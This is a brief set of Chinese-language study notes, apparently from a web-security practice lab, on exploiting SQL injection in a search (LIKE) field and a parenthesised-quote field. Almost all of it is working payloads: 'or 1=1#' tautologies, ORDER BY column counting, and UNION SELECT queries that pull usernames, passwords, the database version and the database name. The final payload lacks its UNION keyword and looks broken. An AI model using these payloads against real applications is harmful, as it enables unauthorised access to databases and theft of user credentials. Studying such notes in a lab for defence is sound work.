搜索型:
先输入字符'试探一下
有报错信息,说明存在sql注入漏洞
可以脑补一下sql语句:
select 字段1,字段2 from member where username like '% %'
两个%之间是我们要输入的内容
select 字段1,字段2 from member where username like '% k%' or 1=1# %'
payload:
k%' or 1=1#
1%' UNION select level,username,password from users#
k%' order by 3#
k%' union select version()#
xx型:
1'不行
1"不行
1)'不行
1') or 1=1#
1') order by 4#
1') order by 2#
1') select version(),database()#